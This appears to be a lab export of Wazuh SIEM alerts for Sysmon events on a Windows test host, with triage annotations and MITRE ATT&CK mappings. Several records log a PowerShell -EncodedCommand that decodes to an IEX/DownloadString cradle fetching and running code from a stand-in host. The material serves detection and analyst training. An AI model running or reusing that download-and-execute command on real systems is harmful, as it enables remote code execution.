rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534219.1096594
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:08.9070653Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282583
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:08.897 ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} ProcessId: 652 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4zn2k3va.n12.ps1 CreationUtcTime: 2025-04-24 22:36:08.897 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:08.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd7-680a-d00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  652
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4zn2k3va.n12.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:08.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.133+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.133+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1099355
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:11.0618882Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282615
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:09.916 ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} ProcessId: 852 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00} ParentProcessId: 652 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:09.916
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd9-680a-d30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd7-680a-d00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  652
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.148+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.148+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1107410
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:11.3086728Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282616
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:11.299 ProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} ProcessId: 852 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qvvde2p2.pvc.ps1 CreationUtcTime: 2025-04-24 22:36:11.299 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:11.299
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd9-680a-d30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qvvde2p2.pvc.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:11.299
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.519+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.519+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534220.1110171
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:13.4580716Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282642
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:12.326 ProcessGuid: {94294ddc-bcdc-680a-d60a-000000000e00} ProcessId: 8684 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcd9-680a-d30a-000000000e00} ParentProcessId: 852 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:12.326
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcdc-680a-d60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8684
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcd9-680a-d30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  852
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:00.534+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:00.534+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

